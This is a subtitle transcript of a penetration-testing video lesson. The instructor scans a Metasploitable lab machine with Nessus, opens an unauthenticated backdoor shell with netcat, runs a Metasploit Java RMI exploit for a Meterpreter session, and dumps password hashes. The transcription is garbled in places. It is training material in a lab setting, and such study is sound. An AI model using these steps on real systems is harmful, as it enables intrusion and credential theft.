1
00:00:00,360 --> 00:00:02,740
So the scan is completed in 17 minutes.

2
00:00:03,390 --> 00:00:08,940
Now, another pause here, because I disable the windows plug ins, it seems as if the Windows systems

3
00:00:08,940 --> 00:00:10,640
don't have critical vulnerabilities.

4
00:00:10,980 --> 00:00:15,960
It's not right, especially my Windows XP has several critical vulnerabilities.

5
00:00:16,530 --> 00:00:21,930
If you didn't disable windows plug ins, you're supposed to see some more vulnerabilities for Windows

6
00:00:21,930 --> 00:00:22,440
systems.

7
00:00:23,720 --> 00:00:30,680
Now to see the results of the voidable scan in detail, let's click the Métis Voidable results to 06.

8
00:00:32,020 --> 00:00:39,100
The Nessa's home found 10 critical vulnerabilities with their scan configuration, but please note that

9
00:00:39,100 --> 00:00:46,000
the configuration affects the results so the target systems may have more vulnerabilities than reported.

10
00:00:47,740 --> 00:00:54,100
If there is a vulnerability and it's not found in a scan, we call it a false negative.

11
00:00:55,230 --> 00:01:01,400
I'm sure you know that the critical vulnerabilities are the most dangerous ones, but that's where it

12
00:01:01,400 --> 00:01:02,040
gets good.

13
00:01:02,060 --> 00:01:04,450
They are the most exploitable ones in general.

14
00:01:05,180 --> 00:01:11,240
So let's click on one of these critical vulnerabilities, for example, being shown back door detection.

15
00:01:12,670 --> 00:01:18,280
Well, look at the description, it says a shell is listening on the port without any authentication

16
00:01:18,280 --> 00:01:19,060
being required.

17
00:01:19,750 --> 00:01:21,880
This is obviously a back door.

18
00:01:23,020 --> 00:01:25,090
Your support number of 15 24.

19
00:01:25,600 --> 00:01:31,270
Now let's check of the finding is a true positive go to terminal screen.

20
00:01:31,850 --> 00:01:40,810
I used Ngarkat tool to connect simply type ency and the target IP and the target bought 15 24 and we're

21
00:01:40,810 --> 00:01:41,020
in.

22
00:01:42,430 --> 00:01:44,230
We have the shell for Métis voidable.

23
00:01:45,670 --> 00:01:50,970
Type, who am I to learn the credential we have, we are the user.

24
00:01:51,550 --> 00:01:54,880
Now, it was too simple, it's just not fun.

25
00:01:54,880 --> 00:01:56,620
And, you know, I don't like it.

26
00:01:56,620 --> 00:01:57,610
I like a good challenge.

27
00:01:57,610 --> 00:01:57,900
Right.

28
00:01:58,330 --> 00:02:03,010
I mean, we are the route user and we can access anything we want.

29
00:02:03,010 --> 00:02:07,420
For example, shadow file, which contains the hashes of the user's passwords.

30
00:02:14,510 --> 00:02:21,830
OK, back to the browser and click on the back to vulnerability's link to turn back to the vulnerabilities

31
00:02:21,830 --> 00:02:22,640
of Métis voidable.

32
00:02:23,750 --> 00:02:25,310
Now, I'd like to show you some more.

33
00:02:26,690 --> 00:02:33,710
Scroll on down the vulnerability, it shows 50 vulnerabilities per page by default, but let's make

34
00:02:33,710 --> 00:02:36,350
it 200 to see all the findings in a single page.

35
00:02:37,980 --> 00:02:43,320
Now, the findings are ordered by SAVARY levels, so information is at the bottom.

36
00:02:44,290 --> 00:02:50,470
Findings with the severity level of information identify non vulnerability information, which is,

37
00:02:50,470 --> 00:02:55,260
you know, nice to know, and it keeps it separate from the vulnerability detail.

38
00:02:57,070 --> 00:03:01,990
So here there's an info RMI registry detection, let's click it.

39
00:03:02,880 --> 00:03:08,700
It says that the remote host is running an RMI registry, retrieving remote objects in the Java runtime

40
00:03:08,700 --> 00:03:10,300
method invocation system.

41
00:03:11,370 --> 00:03:17,220
So let's look for the exploits of the Métis Floyd framework if there is any exploit for Java RMI.

42
00:03:38,710 --> 00:03:42,160
Opening terminal screen and run MSF console.

43
00:03:49,990 --> 00:03:55,180
So here we have MSF console, let's search the exploits of RMI.

44
00:04:09,150 --> 00:04:10,190
Too many results.

45
00:04:11,750 --> 00:04:15,650
To keep it more specific, I want to search Java RMI.

46
00:04:22,310 --> 00:04:30,470
So we have to auxiliaries and to exploits at this time, so look at the exploit in the last line, this

47
00:04:30,470 --> 00:04:37,100
module takes advantage of the default configuration of the RMI registry and RMI activation services,

48
00:04:37,520 --> 00:04:39,950
which allow loading classes from any remote.

49
00:04:39,950 --> 00:04:40,640
You, Earl.

50
00:04:41,800 --> 00:04:44,020
Let's try to use it on our RMI poor.

51
00:04:45,340 --> 00:04:49,570
Please don't worry, I am going to explain what these all mean.

52
00:04:49,750 --> 00:04:53,050
I just want to show you an example at the beginning.

53
00:04:53,440 --> 00:04:54,220
So bear with me.

54
00:04:54,790 --> 00:04:57,760
I use the module name with the full path.

55
00:04:58,580 --> 00:05:04,090
You can simply select the module name and click the middle button of the mouse to copy and paste it.

56
00:05:05,400 --> 00:05:10,470
Type show payloads to see the payloads can be used with this module.

57
00:05:12,130 --> 00:05:15,050
So I want to use this payload to have an interpreter session.

58
00:05:15,110 --> 00:05:20,020
Again, don't worry, I'll explain what the interpreter is soon, but just copy and paste the payload

59
00:05:20,020 --> 00:05:25,920
name type show options to see the parameters of the exploit and the payload as well.

60
00:05:27,010 --> 00:05:34,660
Set the remote host as Métis voidable two zero six default remote port is the same with our port one

61
00:05:34,660 --> 00:05:35,560
zero nine nine.

62
00:05:36,550 --> 00:05:44,500
Servoz is the local host to listen on, set this to be our colleague to to to.

63
00:05:45,500 --> 00:05:47,420
By default, support remain.

64
00:05:49,180 --> 00:05:51,310
So the other options are not required.

65
00:05:51,340 --> 00:05:52,450
I'll just leave it blank.

66
00:05:53,850 --> 00:06:01,200
Now, are the payload options set the listen host to be our colleague to to to default?

67
00:06:01,200 --> 00:06:07,590
Listen, port is good for four, four, four and finally type exploit to run the exploit.

68
00:06:15,060 --> 00:06:18,210
So there it looks like we have a better picture session.

69
00:06:19,250 --> 00:06:26,720
Type sessions dash l to list the active sessions, be patient, we'll see them in detail type session

70
00:06:27,060 --> 00:06:34,070
dashi session ID to interact with a session and here we are, we're in now.

71
00:06:34,070 --> 00:06:38,380
I'm going to show you what we can do with an interpreter session in the following chapter.

72
00:06:38,690 --> 00:06:44,180
But here's a couple of Mettenberger commands disinfo info to see the system information.

73
00:06:48,050 --> 00:06:50,660
Hash dump the gather password hashes.

74
00:06:51,560 --> 00:06:58,970
Now, no such command for this system, thankfully, we have an alternative for this type run post Linux

75
00:06:59,420 --> 00:07:05,060
gathers hash, dump and hit, enter and collect the fruits of your labor.

76
00:07:06,210 --> 00:07:12,890
So as you see here, we found another way to exploit the system, even though the finding was just information.

77
00:07:13,710 --> 00:07:17,430
So I hope you understand not to underestimate any finding.